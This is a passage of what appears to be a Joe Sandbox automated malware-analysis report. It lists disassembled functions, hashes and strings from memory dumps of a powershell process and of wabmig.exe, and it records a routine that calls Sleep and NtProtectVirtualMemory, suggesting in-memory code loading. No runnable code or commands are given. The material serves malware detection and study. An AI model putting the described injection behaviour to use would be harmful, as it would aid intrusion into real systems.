              • API String ID: 0-2658044375
              • Opcode ID: 96e834d8b14d618c8e36c93741d430c6267986dda880758741ab429c3783bf8b
              • Instruction ID: 6ee3e08894ab8fdb15922fa6e4327b331af34661180207f3896be91842cdabeb
              • Opcode Fuzzy Hash: 96e834d8b14d618c8e36c93741d430c6267986dda880758741ab429c3783bf8b
              • Instruction Fuzzy Hash: 95A1FAB170010A9FCB34DF68C544BEABBA2AF89394F248855EC059F395DA31DD45CBA1
              Function 077B9668 Relevance: 14.2, Strings: 11, Instructions: 477COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$ l$ l$ l$ l
              • API String ID: 0-2087132761
              • Opcode ID: 51c377d0fd0f5980011d1b14b8de71726c684362f611b3fc57b8f907de1f60e2
              • Instruction ID: 8f8ee47f2f4537969c064015640a031b61e617baabc50a5ed02cc943ea3250f8
              • Opcode Fuzzy Hash: 51c377d0fd0f5980011d1b14b8de71726c684362f611b3fc57b8f907de1f60e2
              • Instruction Fuzzy Hash: 29F137B1B04219CFC7249B6898017EABBE5AFC5350F14847ADB65CB351DB32EC45CBA1
              Function 077B2390 Relevance: 12.8, Strings: 10, Instructions: 306COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
              • API String ID: 0-3512890053
              • Opcode ID: 5613c508d5273ddbfb68e6cdd306b6998e30c40dfd1ae3ea4d0af543ee1da2b0
              • Instruction ID: 526e5823a4ce289212d7e3f021f9df3245fd45ae176f40a9da4875fc625a9dec
              • Opcode Fuzzy Hash: 5613c508d5273ddbfb68e6cdd306b6998e30c40dfd1ae3ea4d0af543ee1da2b0
              • Instruction Fuzzy Hash: 1EA199B170630A8FCB355A6898507EABBE1BF85294F1488BBD405CF653DE35CC85C7A1
              Function 077B1950 Relevance: 10.4, Strings: 8, Instructions: 389COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q$t~qq$$^q$$^q$$^q
              • API String ID: 0-1719666192
              • Opcode ID: 0279658a0fa307aff0b8b9c001a6fecd27aa8121d271c3fc4c79a4f56835bcb1
              • Instruction ID: a78613f50468abbb434ef242258885efae6228c33c06248ea96654eccc3e73d6
              • Opcode Fuzzy Hash: 0279658a0fa307aff0b8b9c001a6fecd27aa8121d271c3fc4c79a4f56835bcb1
              • Instruction Fuzzy Hash: 78C156B1B0034D9FCB249B7994607EBBBE2AFC6250F64887AD405CB245EF31D945C7A1
              Function 077BDE15 Relevance: 10.2, Strings: 8, Instructions: 194COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 84(l$84(l$XRcq$XRcq$XRcq$tP^q$tP^q$$^q
              • API String ID: 0-2781672613
              • Opcode ID: db61ed92c8f792e6cd1cd418a9902080a036aab2ae1c58217315f997b0d88a53
              • Instruction ID: 2fe729445b9b84c78e25e4bd98d76587c1200981e27dc9e6972627ebecfcaab0
              • Opcode Fuzzy Hash: db61ed92c8f792e6cd1cd418a9902080a036aab2ae1c58217315f997b0d88a53
              • Instruction Fuzzy Hash: D7610971B001099FC7349FA8C440BEAFBA2AF89750F24C869E8159F355CB71DC45CBA1
              Function 077BD020 Relevance: 10.2, Strings: 8, Instructions: 153COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$84(l$TQcq$TQcq$tP^q$$^q$$^q$$^q
              • API String ID: 0-2954187678
              • Opcode ID: c4cce7c464dcc545fe6a5b23fb0c8f9a14ce1d83335026529f35bf7b5a88e8f4
              • Instruction ID: bcae9360e3d9b32feca7cb213effcaf20bfb915c8de3516c927dc76f72e9ec4e
              • Opcode Fuzzy Hash: c4cce7c464dcc545fe6a5b23fb0c8f9a14ce1d83335026529f35bf7b5a88e8f4
              • Instruction Fuzzy Hash: 6151C1B070020ADFDB388E55C548BE6B7B2AF85391F198C6AE8049B294C771DC85CB91
              Function 077BCAE7 Relevance: 8.9, Strings: 7, Instructions: 156COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$84(l$d%dq$d%dq$d%dq$tP^q$$^q
              • API String ID: 0-1985567861
              • Opcode ID: f8b3769c43f7cf7f5332856d7622785bd9bfdbafee6d073191cfc43796bfbcf0
              • Instruction ID: f4ce482b15ad52151878acb9c23b7b56a39b858cb6edd1ded94e65cc4c645c6a
              • Opcode Fuzzy Hash: f8b3769c43f7cf7f5332856d7622785bd9bfdbafee6d073191cfc43796bfbcf0
              • Instruction Fuzzy Hash: E851E5F4A00206DFDB368E14C544BEABBE2AF45790F58C96AE8059F295DB31DD44CBB0
              Function 077B00F0 Relevance: 8.0, Strings: 6, Instructions: 454COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$XY*l$XY*l$tP^q$tP^q
              • API String ID: 0-492239295
              • Opcode ID: b176e1c0f464901cda60e14124ba3c96e83fe2383ca6d6a65d6f34fb7a996fb3
              • Instruction ID: e464055091a550a70e017c27164cdb834efa67a52c1749bfbd187480bada6143
              • Opcode Fuzzy Hash: b176e1c0f464901cda60e14124ba3c96e83fe2383ca6d6a65d6f34fb7a996fb3
              • Instruction Fuzzy Hash: 1AE10AB1B043098FC7348A689854BEBBBE6AFC6790F14887BD905CF355EA31D845C7A1
              Function 077BCC1E Relevance: 7.6, Strings: 6, Instructions: 85COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$84(l$d%dq$d%dq$d%dq$tP^q
              • API String ID: 0-25645718
              • Opcode ID: 24b3a75bd9d6930debe84330a6de6dfb444b9d5003a414ef8f9f6165f81ee466
              • Instruction ID: d1c6cfe50bd1b3e15cb1f166272fc72de5b763bb1c60d7ef30492f8f6927f457
              • Opcode Fuzzy Hash: 24b3a75bd9d6930debe84330a6de6dfb444b9d5003a414ef8f9f6165f81ee466
              • Instruction Fuzzy Hash: 2F31B1B4B002199FCB29DF58C554FAABBA2BB48790F24D959E815AF354C632DC41CBA0
              Function 077B1F48 Relevance: 6.5, Strings: 5, Instructions: 210COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $^q$$^q$$^q$$^q$$^q
              • API String ID: 0-358201761
              • Opcode ID: 0aa1ddaa6430c01a7c47195df1088d98480eca3f3cd71518199aa630646dd63b
              • Instruction ID: 76ba91e820e5062bbffc63e29809e80ca8bfb7656826341a554b64fd7f74c539
              • Opcode Fuzzy Hash: 0aa1ddaa6430c01a7c47195df1088d98480eca3f3cd71518199aa630646dd63b
              • Instruction Fuzzy Hash: A85168B130424A9FD7345A6A8C40BA6BBA6AFC1790F14C87AE905CF393DE36D845C361
              Function 077BD7A5 Relevance: 6.4, Strings: 5, Instructions: 194COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 84(l$84(l$tP^q$tP^q$$^q
              • API String ID: 0-1388544045
              • Opcode ID: 50e6a2eaeb056a014a2ebf50eb12c65f119f9009f5853c61138db17204ac7943
              • Instruction ID: ece0a3822d779c33cd86256c4c535e49fa36bcd6300a581ae40140a2a671e796
              • Opcode Fuzzy Hash: 50e6a2eaeb056a014a2ebf50eb12c65f119f9009f5853c61138db17204ac7943
              • Instruction Fuzzy Hash: 7161D375B002099FC7349F688404BEABBA2EF89750F24C8A9E8459B391CB31DC45CBA1
              Function 077BB190 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $^q$$^q$$^q$ l$ l
              • API String ID: 0-469628843
              • Opcode ID: d4446b06c3b3649d99e05222bbbe104b3162783bd42dcdae43a958c74546b3e1
              • Instruction ID: 7733b586f6411162d033d69fe3714bc863714d984579f2695f75c31d0a8aadd2
              • Opcode Fuzzy Hash: d4446b06c3b3649d99e05222bbbe104b3162783bd42dcdae43a958c74546b3e1
              • Instruction Fuzzy Hash: D611E9F170430E9BE738595A9804BA7B79BABC57A0F248C2BEC55CB364C931D441C750
              Function 077BC388 Relevance: 5.5, Strings: 4, Instructions: 473COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (o^q$(o^q$(o^q$(o^q
              • API String ID: 0-1978863864
              • Opcode ID: c0009875646eabdb2b49f4aa656ed8801660390b5d4980601a841cbe68ff1d0d
              • Instruction ID: f0701e08d4129202be6282c912fd52a7cc29b98ba7dcb1b7ebba871c32c38ab2
              • Opcode Fuzzy Hash: c0009875646eabdb2b49f4aa656ed8801660390b5d4980601a841cbe68ff1d0d
              • Instruction Fuzzy Hash: D3F125B1704349DFDB268F68C844BFABBA2AF85390F14C86AE555CB291DB31C845C7B1
              Function 077B4C98 Relevance: 5.3, Strings: 4, Instructions: 275COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 84(l$84(l$tP^q$tP^q
              • API String ID: 0-1663469882
              • Opcode ID: dd9e21d76e2b5a9043e724dd5641ac988fbac48800d72a578d0b1f899e2bb155
              • Instruction ID: 2478934eae0be50982df2322eefede9e612d7a25bc505b8caf7647dbd1bf4250
              • Opcode Fuzzy Hash: dd9e21d76e2b5a9043e724dd5641ac988fbac48800d72a578d0b1f899e2bb155
              • Instruction Fuzzy Hash: DA913DB1B002469FC7349E69C454BBABBE6AF85750F188C69D905CF392DB31DC44C791
              Function 077B7228 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l$(f*l$(f*l$(f*l
              • API String ID: 0-792637747
              • Opcode ID: fae723ee980d36c73ab2a58c6ecfb8fc4a20f197556e1f19225b94a1ff32d616
              • Instruction ID: 51d71ee6a9ab426642a766bd57ad0b7bc75aa564518c6bbeb3dcde7c972441db
              • Opcode Fuzzy Hash: fae723ee980d36c73ab2a58c6ecfb8fc4a20f197556e1f19225b94a1ff32d616
              • Instruction Fuzzy Hash: C27132B4A00209DFDB28CF98C551B9ABBB2EFC5350F15856AD805AB355CB31EC85CB91
              Function 077B1758 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$$^q$$^q
              • API String ID: 0-2049395529
              • Opcode ID: ad71d6513b9478f2e4eeae56d0600415b05efc074852a8358c7625f7c239aa2e
              • Instruction ID: f0f9ec1d79995e0cd695f67a4755f202fe0cadab2744215e7fd901301d511736
              • Opcode Fuzzy Hash: ad71d6513b9478f2e4eeae56d0600415b05efc074852a8358c7625f7c239aa2e
              • Instruction Fuzzy Hash: A301DFA2B4D38D8FC73A12791834695BFB65BC399076A04EBD041CF3A7DD158C4AC3A2

              Execution Graph

              Execution Coverage:0%
              Dynamic/Decrypted Code Coverage:95.8%
              Signature Coverage:25.3%
              Total number of Nodes:95
              Total number of Limit Nodes:0
              execution_graph 62396 2196a790 402 API calls 62398 2196bf80 340 API calls __startOneArgErrorHandling 62399 21970780 326 API calls 62403 219b2380 620 API calls __startOneArgErrorHandling 62281 2199f5b0 328 API calls 3 library calls 62404 21a29793 9 API calls __startOneArgErrorHandling 62284 2196c1a0 324 API calls 62405 21973fa0 459 API calls 62287 219a6da0 322 API calls 62406 219a33a0 321 API calls __startOneArgErrorHandling 62291 2196c1d0 500 API calls 62293 2199add0 325 API calls 62294 2199cdd0 GetPEB GetPEB 62410 219a63d0 523 API calls 2 library calls 62411 219a97d0 322 API calls 62412 2196efd8 196 API calls __startOneArgErrorHandling 62297 219759c0 693 API calls 2 library calls 62298 219965c0 408 API calls _vswprintf_s 62414 2199c3f0 321 API calls 62416 2199cbf0 GetPEB GetPEB GetPEB GetPEB 62304 219681e6 8 API calls 62307 219a59e0 320 API calls 62424 219a7b13 621 API calls 62311 2196e104 326 API calls 62427 219b1f0f 328 API calls 2 library calls 62312 21972102 203 API calls 62428 21968300 317 API calls 62429 2196bf00 326 API calls 62313 21970100 552 API calls 2 library calls 62432 21967330 315 API calls _vswprintf_s 62316 21971d30 314 API calls _vswprintf_s 62317 2198c930 493 API calls 62320 2196b120 392 API calls 62437 21973720 329 API calls __startOneArgErrorHandling 62438 2199eb20 326 API calls 62439 219af320 320 API calls __startOneArgErrorHandling 62445 219f2349 571 API calls 2 library calls 62448 21a1437c 319 API calls 62449 2197c770 GetPEB __except_handler4 62331 219ab970 359 API calls 62271 477e682 62274 477e6b8 62271->62274 62272 477e6da Sleep 62272->62271 62273 477e6e9 NtProtectVirtualMemory 62273->62274 62274->62271 62274->62272 62274->62273 62336 219a909c 337 API calls 2 library calls 62457 219aba90 10 API calls __startOneArgErrorHandling 62458 219f368c 318 API calls 3 library calls 62459 219a3e8f 318 API calls 62340 2196b480 197 API calls 62461 21967a80 336 API calls __startOneArgErrorHandling 62463 219c6282 320 API calls 62344 219678b0 193 API calls 62345 21973cb0 15 API calls 62464 21971ea0 17 API calls 62465 219852a0 353 API calls 2 library calls 62348 219abca0 530 API calls 62468 219ac6a6 536 API calls 2 library calls 62471 2196b2c0 335 API calls 62473 2199eac0 195 API calls 62474 219a6ac0 200 API calls 62352 2196c0f0 335 API calls 62477 2196fef0 12 API calls 62353 219724f0 509 API calls 62354 219798f0 566 API calls 62356 219b20f0 9 API calls __startOneArgErrorHandling 62480 2196a2e0 526 API calls 2 library calls 62482 2199d6e0 605 API calls 2 library calls 62361 21a1ecdd 191 API calls _vswprintf_s 62484 219f321f 356 API calls 2 library calls 62485 21968210 192 API calls 62488 219aa210 8 API calls 62490 219a9e0c 490 API calls __startOneArgErrorHandling 62363 219a8402 537 API calls 2 library calls 62365 219acc00 212 API calls 62492 219a8600 8 API calls 62493 2196ea0c 501 API calls __startOneArgErrorHandling 62369 219abc3b 319 API calls __startOneArgErrorHandling 62499 2197ba30 532 API calls 62501 219a8e2f 343 API calls 62373 2196a020 316 API calls 62374 2196c020 11 API calls 62375 2196e420 379 API calls __startOneArgErrorHandling 62376 2196ec20 7 API calls 62505 2198e627 543 API calls __except_handler4 62380 21972050 338 API calls 62382 2199b052 344 API calls 2 library calls 62383 2196645d 538 API calls __startOneArgErrorHandling 62384 21967440 6 API calls __startOneArgErrorHandling 62511 219a7a40 319 API calls 62388 219a9870 394 API calls 62277 219b2c70 LdrInitializeThunk 62518 21969660 470 API calls 62520 219a9660 498 API calls __startOneArgErrorHandling 62522 2196826b 327 API calls __startOneArgErrorHandling 62395 21a1705e 555 API calls __except_handler4

              Executed Functions

              Function 0477E682 Relevance: 3.1, APIs: 2, Instructions: 51sleepnativeCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • Sleep.KERNELBASE(00000005), ref: 0477E6E2
              • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0477E728
              Memory Dump Source
              • Source File: 0000000A.00000002.2430056640.0000000003D80000.00000040.00000400.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_3d80000_wabmig.jbxd
              Similarity
              • API ID: MemoryProtectSleepVirtual
              • String ID:
              • API String ID: 3235210055-0
              • Opcode ID: ebe4981c5d3dbd649a7742f3c74ec9fb5e91173ddd1b1bf0dd7e5333201190a3
              • Instruction ID: df4e89965b762a7e9dcabaf327a1b3e765e2727b2e7f79e885ac4dfc3acf84b2
              • Opcode Fuzzy Hash: ebe4981c5d3dbd649a7742f3c74ec9fb5e91173ddd1b1bf0dd7e5333201190a3
              • Instruction Fuzzy Hash: E41129B15113019FEB459F35CDCD7E9B361AF243A1F898298EC409B2FAD368D880CB12
              Function 219B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 12 219b35c0-219b35cc LdrInitializeThunk
              APIs
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: acb4913284ab2f86edc37c27f30282847216cff7d92f450abea3fa7d6220043f
              • Instruction ID: ff7d515fbe30354d2c6d760eee544f42bebf3ec1aa6cba7be8d38250c07f6887
              • Opcode Fuzzy Hash: acb4913284ab2f86edc37c27f30282847216cff7d92f450abea3fa7d6220043f
              • Instruction Fuzzy Hash: DB90023160560402D100725D4558706500957D4601F65C421A0864528DC7968A5166A3
              Function 219B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 11 219b2df0-219b2dfc LdrInitializeThunk
              APIs
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 451fe47937b4266198593e360487c322a475ec8653add305824a1e2cb2fdb923
              • Instruction ID: eed2167fa725aab04c90a189d70c05bce848eff0f815908af0abd603e47f13a2
              • Opcode Fuzzy Hash: 451fe47937b4266198593e360487c322a475ec8653add305824a1e2cb2fdb923
              • Instruction Fuzzy Hash: 5D90023120150413D111725D4548707400D57D4641F95C422A0864518DD6578A52A222
              Function 219B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 10 219b2c70-219b2c7c LdrInitializeThunk
              APIs
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 18f8cb0ee641cea003bf5341d8bc90d596e0180a2ab9a343ef04cedf4cbf6255
              • Instruction ID: 6fccb2dd50ddd6f1fb7f46ebfe142dbc3632165f2a3b78d8da3a3e1cc50ea9a5
              • Opcode Fuzzy Hash: 18f8cb0ee641cea003bf5341d8bc90d596e0180a2ab9a343ef04cedf4cbf6255
              • Instruction Fuzzy Hash: E190023120158802D110725D844874A400957D4701F59C421A4864618DC69689917222

              Non-executed Functions

              Function 219F2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
              • API String ID: 0-2160512332
              • Opcode ID: 68531f2bd67e68bfb539461687340dbc82dffd6f08cf5f0633a87a1b8ff854aa
              • Instruction ID: 131288060137bc68c01ca47432f175a32abad85203726896c174a5755a844ca5
              • Opcode Fuzzy Hash: 68531f2bd67e68bfb539461687340dbc82dffd6f08cf5f0633a87a1b8ff854aa
              • Instruction Fuzzy Hash: 62929A71A08742AFE721CF24C880F5BBBE8BB85754F10492DFA98D7290D774E944CB92
              Function 21A212ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
              • API String ID: 0-3591852110
              • Opcode ID: 622979bca3ad2104e0698eac0af7f7a7a240933f3f95d1f2a2bfec35ab0a4d25
              • Instruction ID: 4dabb9d004ecd761909ac890d8584899f67c633bd4664137547b7d9cde71df2f
              • Opcode Fuzzy Hash: 622979bca3ad2104e0698eac0af7f7a7a240933f3f95d1f2a2bfec35ab0a4d25
              • Instruction Fuzzy Hash: AD12D771600A42DFD725CF65C480BBABBF6FF4A714F18845DE48A8B642E735E981CB90
              Function 2196D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
              • API String ID: 0-3532704233
              • Opcode ID: 28139f4a13b3bd5234e4788a074a731fc34943e79fe1e99ad7010ba466297cf3
              • Instruction ID: 1d06605a5ab5f544afa59f7cc77c83b58aa965924451936e1c6a515c626d3fee
              • Opcode Fuzzy Hash: 28139f4a13b3bd5234e4788a074a731fc34943e79fe1e99ad7010ba466297cf3
              • Instruction Fuzzy Hash: DBB17A719083969FD711CF29C880A5BBBECAB89754F01496EF9DCD7240E731DA448BA2
              Function 21A09179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
              • API String ID: 0-3063724069
              • Opcode ID: f296cff9e5c28356f09cddbc5dee0ea5cfd9caec9f224c374f7746a6b6e0ae2d
              • Instruction ID: b1a9ae6e9d966da67c951438f97b7f684f95544984e05bc49cb01e2fdaecf9d2
              • Opcode Fuzzy Hash: f296cff9e5c28356f09cddbc5dee0ea5cfd9caec9f224c374f7746a6b6e0ae2d
              • Instruction Fuzzy Hash: F5D1E3B2805312AFD722CF64D840B5BBBE8BFA5754F45092DFA9CA7150E730CA44CB92
              Function 21A20274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
